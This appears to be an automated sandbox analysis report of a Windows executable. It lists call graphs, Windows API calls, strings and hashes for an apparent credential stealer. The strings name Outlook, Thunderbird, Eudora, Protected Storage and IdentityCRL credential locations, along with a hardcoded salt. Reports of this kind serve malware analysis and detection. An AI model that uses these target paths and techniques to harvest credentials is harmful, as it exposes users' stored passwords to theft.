LocalFree 33541->33543 33714 40466b _mbscpy 33541->33714 33542->33541 33543->33541 33544 410a9c RegOpenKeyExA 33544->33423 33545->33427 33715 410a9c RegOpenKeyExA 33546->33715 33548 402c7a 33549 402da5 33548->33549 33550 402c87 memset 33548->33550 33549->33432 33716 410b62 RegEnumKeyExA 33550->33716 33552 402d9c RegCloseKey 33552->33549 33553 410b1e 3 API calls 33554 402ce4 memset sprintf 33553->33554 33717 410a9c RegOpenKeyExA 33554->33717 33556 402d28 33557 402d3a sprintf 33556->33557 33718 402bd1 40 API calls 33556->33718 33719 410a9c RegOpenKeyExA 33557->33719 33562 402cb2 33562->33552 33562->33553 33563 402d9a 33562->33563 33720 402bd1 40 API calls 33562->33720 33721 410b62 RegEnumKeyExA 33562->33721 33563->33552 33564->33435 33565->33439 33566->33443 33568 410816 33567->33568 33569 4107f1 FreeLibrary 33568->33569 33570 403ddd 33569->33570 33570->33448 33722 410a9c RegOpenKeyExA 33571->33722 33573 402ff9 33574 403006 memset 33573->33574 33575 40312c 33573->33575 33723 410b62 RegEnumKeyExA 33574->33723 33575->33452 33577 403122 RegCloseKey 33577->33575 33578 410b1e 3 API calls 33579 403058 memset sprintf 33578->33579 33724 410a9c RegOpenKeyExA 33579->33724 33581 403033 33581->33577 33581->33578 33582 4030a2 memset 33581->33582 33584 410b62 RegEnumKeyExA 33581->33584 33585 4030f9 RegCloseKey 33581->33585 33726 402db3 26 API calls 33581->33726 33725 410b62 RegEnumKeyExA 33582->33725 33584->33581 33585->33581 33588 4032d5 33587->33588 33589 4033a9 33587->33589 33727 4021b6 memset 33588->33727 33602 4034e4 memset memset 33589->33602 33591 4032e1 33728 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33591->33728 33593 4032ea 33594 4032f8 memset GetPrivateProfileSectionA 33593->33594 33729 4023e5 16 API calls 33593->33729 33594->33589 33599 40332f 33594->33599 33596 40339b strlen 33596->33589 33596->33599 33598 403350 strchr 33598->33599 33599->33589 33599->33596 33730 4021b6 memset 33599->33730 33731 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33599->33731 33732 4023e5 16 API calls 33599->33732 33603 410b1e 3 API calls 33602->33603 33604 40353f 33603->33604 33605 40357f 33604->33605 33606 403546 _mbscpy 33604->33606 33610 403985 33605->33610 33733 406d55 strlen _mbscat 33606->33733 33608 403565 _mbscat 33734 4033f0 19 API calls 33608->33734 33735 40466b _mbscpy 33610->33735 33614 4039aa 33615 4039ff 33614->33615 33736 40f460 memset memset 33614->33736 33757 40f6e2 33614->33757 33773 4038e8 21 API calls 33614->33773 33617 404785 FreeLibrary 33615->33617 33618 403a0b 33617->33618 33619 4037ca memset memset 33618->33619 33781 444551 memset 33619->33781 33621 4038e2 33621->33462 33685 40f334 334 API calls 33621->33685 33624 40382e 33625 406f06 2 API calls 33624->33625 33626 403843 33625->33626 33627 406f06 2 API calls 33626->33627 33628 403855 strchr 33627->33628 33629 403884 _mbscpy 33628->33629 33630 403897 strlen 33628->33630 33631 4038bf _mbscpy 33629->33631 33630->33631 33632 4038a4 sprintf 33630->33632 33793 4023e5 16 API calls 33631->33793 33632->33631 33635 44b090 33634->33635 33636 40fb10 RegOpenKeyExA 33635->33636 33637 403e7f 33636->33637 33638 40fb3b RegOpenKeyExA 33636->33638 33648 40f96c 33637->33648 33639 40fb55 RegQueryValueExA 33638->33639 33640 40fc2d RegCloseKey 33638->33640 33641 40fc23 RegCloseKey 33639->33641 33642 40fb84 33639->33642 33640->33637 33641->33640 33643 404734 3 API calls 33642->33643 33644 40fb91 33643->33644 33644->33641 33645 40fc19 LocalFree 33644->33645 33646 40fbdd memcpy memcpy 33644->33646 33645->33641 33798 40f802 11 API calls 33646->33798 33649 4070ae GetVersionExA 33648->33649 33650 40f98d 33649->33650 33651 4045db 7 API calls 33650->33651 33652 40f9a9 33651->33652 33655 40fae6 33652->33655 33656 40fa13 memset WideCharToMultiByte 33652->33656 33653 404656 FreeLibrary 33654 403e85 33653->33654 33660 4442ea memset 33654->33660 33655->33653 33656->33652 33657 40fa43 _strnicmp 33656->33657 33657->33652 33658 40fa5b WideCharToMultiByte 33657->33658 33658->33652 33659 40fa88 WideCharToMultiByte 33658->33659 33659->33652 33661 410dbb 9 API calls 33660->33661 33662 444329 33661->33662 33799 40759e strlen strlen 33662->33799 33667 410dbb 9 API calls 33668 444350 33667->33668 33669 40759e 3 API calls 33668->33669 33670 44435a 33669->33670 33671 444212 65 API calls 33670->33671 33672 444366 memset memset 33671->33672 33673 410b1e 3 API calls 33672->33673 33674 4443b9 ExpandEnvironmentStringsA strlen 33673->33674 33675 4443f4 _strcmpi 33674->33675 33676 4443e5 33674->33676 33677 403e91 33675->33677 33678 44440c 33675->33678 33676->33675 33677->33254 33679 444212 65 API calls 33678->33679 33679->33677 33680->33424 33681->33428 33682->33436 33683->33440 33684->33444 33685->33462 33686->33463 33687->33489 33688->33493 33689->33486 33691 40841c 33690->33691 33692 410a9c RegOpenKeyExA 33691->33692 33692->33502 33693->33508 33694->33508 33695->33512 33696->33514 33697->33508 33698->33517 33699->33523 33700->33523 33701->33526 33702->33523 33704 404656 FreeLibrary 33703->33704 33705 4045e3 LoadLibraryA 33704->33705 33706 404651 33705->33706 33707 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33705->33707 33706->33530 33706->33532 33706->33534 33708 40463d 33707->33708 33709 404643 33708->33709 33710 404656 FreeLibrary 33708->33710 33709->33706 33710->33706 33712 403cd2 33711->33712 33713 40465c FreeLibrary 33711->33713 33712->33544 33713->33712 33714->33541 33715->33548 33716->33562 33717->33556 33718->33557 33719->33562 33720->33562 33721->33562 33722->33573 33723->33581 33724->33581 33725->33581 33726->33581 33727->33591 33728->33593 33729->33594 33730->33598 33731->33599 33732->33599 33733->33608 33734->33605 33735->33614 33774 4078ba 33736->33774 33739 4078ba _mbsnbcat 33740 40f5a3 RegOpenKeyExA 33739->33740 33741 40f5c3 RegQueryValueExA 33740->33741 33742 40f6d9 33740->33742 33743 40f6d0 RegCloseKey 33741->33743 33744 40f5f0 33741->33744 33742->33614 33743->33742 33744->33743 33745 40f675 33744->33745 33778 40466b _mbscpy 33744->33778 33745->33743 33779 4012ee strlen 33745->33779 33747 40f611 33749 404734 3 API calls 33747->33749 33754 40f616 33749->33754 33750 40f69e RegQueryValueExA 33750->33743 33751 40f6c1 33750->33751 33751->33743 33752 40f66a 33753 404785 FreeLibrary 33752->33753 33753->33745 33754->33752 33755 40f661 LocalFree 33754->33755 33756 40f645 memcpy 33754->33756 33755->33752 33756->33755 33780 40466b _mbscpy 33757->33780 33759 40f6fa 33760 4045db 7 API calls 33759->33760 33761 40f708 33760->33761 33763 404734 3 API calls 33761->33763 33767 40f7e2 33761->33767 33762 404656 FreeLibrary 33764 40f7f1 33762->33764 33768 40f715 33763->33768 33765 404785 FreeLibrary 33764->33765 33766 40f7fc 33765->33766 33766->33614 33767->33762 33768->33767 33769 40f797 WideCharToMultiByte 33768->33769 33770 40f7b8 strlen 33769->33770 33771 40f7d9 LocalFree 33769->33771 33770->33771 33772 40f7c8 _mbscpy 33770->33772 33771->33767 33772->33771 33773->33614 33775 4078e6 33774->33775 33776 4078c7 _mbsnbcat 33775->33776 33777 4078ea 33775->33777 33776->33775 33777->33739 33778->33747 33779->33750 33780->33759 33794 410a9c RegOpenKeyExA 33781->33794 33783 44458b 33784 40381a 33783->33784 33795 410add RegQueryValueExA 33783->33795 33784->33621 33792 4021b6 memset 33784->33792 33786 4445a4 33787 4445dc RegCloseKey 33786->33787 33796 410add RegQueryValueExA 33786->33796 33787->33784 33789 4445c1 33789->33787 33797 444879 30 API calls 33789->33797 33791 4445da 33791->33787 33792->33624 33793->33621 33794->33783 33795->33786 33796->33789 33797->33791 33798->33645 33800 4075c9 33799->33800 33801 4075bb _mbscat 33799->33801 33802 444212 33800->33802 33801->33800 33819 407e9d 33802->33819 33805 44424d 33806 444274 33805->33806 33808 444258 33805->33808 33827 407ef8 33805->33827 33807 407e9d 9 API calls 33806->33807 33816 4442a0 33807->33816 33840 444196 52 API calls 33808->33840 33810 407ef8 9 API calls 33810->33816 33811 4442ce 33837 407f90 33811->33837 33815 407f90 FindClose 33817 4442e4 33815->33817 33816->33810 33816->33811 33818 444212 65 API calls 33816->33818 33841 407e62 strcmp strcmp 33816->33841 33817->33667 33818->33816 33820 407f90 FindClose 33819->33820 33821 407eaa 33820->33821 33822 406f06 2 API calls 33821->33822 33823 407ebd strlen strlen 33822->33823 33824 407ee1 33823->33824 33825 407eea 33823->33825 33842 4070e3 strlen _mbscat _mbscpy _mbscat 33824->33842 33825->33805 33828 407f03 FindFirstFileA 33827->33828 33829 407f24 FindNextFileA 33827->33829 33832 407f3f 33828->33832 33830 407f46 strlen strlen 33829->33830 33831 407f3a 33829->33831 33834 407f7f 33830->33834 33835 407f76 33830->33835 33833 407f90 FindClose 33831->33833 33832->33830 33832->33834 33833->33832 33834->33805 33843 4070e3 strlen _mbscat _mbscpy _mbscat 33835->33843 33838 407fa3 33837->33838 33839 407f99 FindClose 33837->33839 33838->33815 33839->33838 33840->33805 33841->33816 33842->33825 33843->33834 33844->33267 33845->33271 33846->33277 33847->33278 33848->33284 33849->33281 33850->33276 34195 43ffc8 18 API calls 34197 4383cc 110 API calls __fprintf_l 34009 4275d3 41 API calls 34198 4153d3 22 API calls __fprintf_l 34010 444dd7 _XcptFilter 34203 4013de 15 API calls 34205 425115 111 API calls __fprintf_l 34206 43f7db 18 API calls 34209 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34013 4335ee 16 API calls __fprintf_l 34211 429fef 11 API calls 34014 444deb _exit _c_exit 34212 40bbf0 138 API calls 34017 425115 79 API calls __fprintf_l 34216 437ffa 22 API calls 34021 4021ff 14 API calls 34022 43f5fc 149 API calls 34217 40e381 9 API calls 34024 405983 40 API calls 34025 42b186 27 API calls __fprintf_l 34026 427d86 76 API calls 34027 403585 20 API calls 34029 42e58e 18 API calls __fprintf_l 34032 425115 75 API calls __fprintf_l 34034 401592 8 API calls 32934 410b92 32937 410a6b 32934->32937 32936 410bb2 32938 410a77 32937->32938 32939 410a89 GetPrivateProfileIntA 32937->32939 32942 410983 memset _itoa WritePrivateProfileStringA 32938->32942 32939->32936 32941 410a84 32941->32936 32942->32941 34221 434395 16 API calls 34036 441d9c memcmp 34223 43f79b 119 API calls 34037 40c599 43 API calls 34224 426741 87 API calls 34041 4401a6 21 API calls 34043 426da6 memcpy memset memset memcpy 34044 4335a5 15 API calls 34046 4299ab memset memset memcpy memset memset 34047 40b1ab 8 API calls 34229 425115 76 API calls __fprintf_l 34233 4113b2 18 API calls 2 library calls 34237 40a3b8 memset sprintf SendMessageA 33851 410bbc 33854 4109cf 33851->33854 33855 4109dc 33854->33855 33856 410a23 memset GetPrivateProfileStringA 33855->33856 33857 4109ea memset 33855->33857 33862 407646 strlen 33856->33862 33867 4075cd sprintf memcpy 33857->33867 33860 410a0c WritePrivateProfileStringA 33861 410a65 33860->33861 33863 40765a 33862->33863 33865 40765c 33862->33865 33863->33861 33864 4076a3 33864->33861 33865->33864 33868 40737c strtoul 33865->33868 33867->33860 33868->33865 34049 40b5bf memset memset _mbsicmp

                                            Executed Functions

                                            Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                            APIs
                                            • memset.MSVCRT ref: 0040832F
                                            • memset.MSVCRT ref: 00408343
                                            • memset.MSVCRT ref: 0040835F
                                            • memset.MSVCRT ref: 00408376
                                            • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                            • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                            • strlen.MSVCRT ref: 004083E9
                                            • strlen.MSVCRT ref: 004083F8
                                            • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                            • String ID: 5$H$O$b$i$}$}
                                            • API String ID: 1832431107-3760989150
                                            • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                            • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                            • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                            • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                            Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 450 407ef8-407f01 451 407f03-407f22 FindFirstFileA 450->451 452 407f24-407f38 FindNextFileA 450->452 455 407f3f-407f44 451->455 453 407f46-407f74 strlen * 2 452->453 454 407f3a call 407f90 452->454 458 407f83 453->458 459 407f76-407f81 call 4070e3 453->459 454->455 455->453 457 407f89-407f8f 455->457 461 407f86-407f88 458->461 459->461 461->457
                                            APIs
                                            • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                            • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                            • strlen.MSVCRT ref: 00407F5C
                                            • strlen.MSVCRT ref: 00407F64
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FileFindstrlen$FirstNext
                                            • String ID: ACD
                                            • API String ID: 379999529-620537770
                                            • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                            • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                            • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                            • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                            Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • memset.MSVCRT ref: 00401E8B
                                            • strlen.MSVCRT ref: 00401EA4
                                            • strlen.MSVCRT ref: 00401EB2
                                            • strlen.MSVCRT ref: 00401EF8
                                            • strlen.MSVCRT ref: 00401F06
                                            • memset.MSVCRT ref: 00401FB1
                                            • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                            • memset.MSVCRT ref: 00402003
                                            • sprintf.MSVCRT ref: 00402030
                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                            • memset.MSVCRT ref: 00402086
                                            • memset.MSVCRT ref: 0040209B
                                            • strlen.MSVCRT ref: 004020A1
                                            • strlen.MSVCRT ref: 004020AF
                                            • strlen.MSVCRT ref: 004020E2
                                            • strlen.MSVCRT ref: 004020F0
                                            • memset.MSVCRT ref: 00402018
                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                            • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                            • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                            • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                              • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                            • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                            • API String ID: 1846531875-4223776976
                                            • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                            • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                            • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                            • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                            Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,74DF0A60,?,00000000,?,?,?,0040CF60,74DF0A60), ref: 00404AB8
                                              • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                              • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,74DF0A60), ref: 00404ADE
                                              • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                            • DeleteObject.GDI32(?), ref: 0040D1A6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                            • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                            • API String ID: 745651260-375988210
                                            • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                            • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                            • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                            • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                            Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                            • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                            • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                            • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                            Strings
                                            • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                            • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                            • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                            • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                            • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                            • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                            • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                            • pstorec.dll, xrefs: 00403C30
                                            • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                            • PStoreCreateInstance, xrefs: 00403C44
                                            • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                            • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Library$AddressFreeLoadProc_mbscpy
                                            • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                            • API String ID: 1197458902-317895162
                                            • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                            • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                            • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                            • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                            Function 0044B49F Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 118COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                            • String ID: h4ND
                                            • API String ID: 3662548030-3825183422
                                            • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                            • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                            • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                            • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C
                                            Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                            • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                            • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                            • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                            • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                              • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                              • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                              • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                              • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                            • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                            • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                            • API String ID: 2768085393-1693574875
                                            • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                            • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                            • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
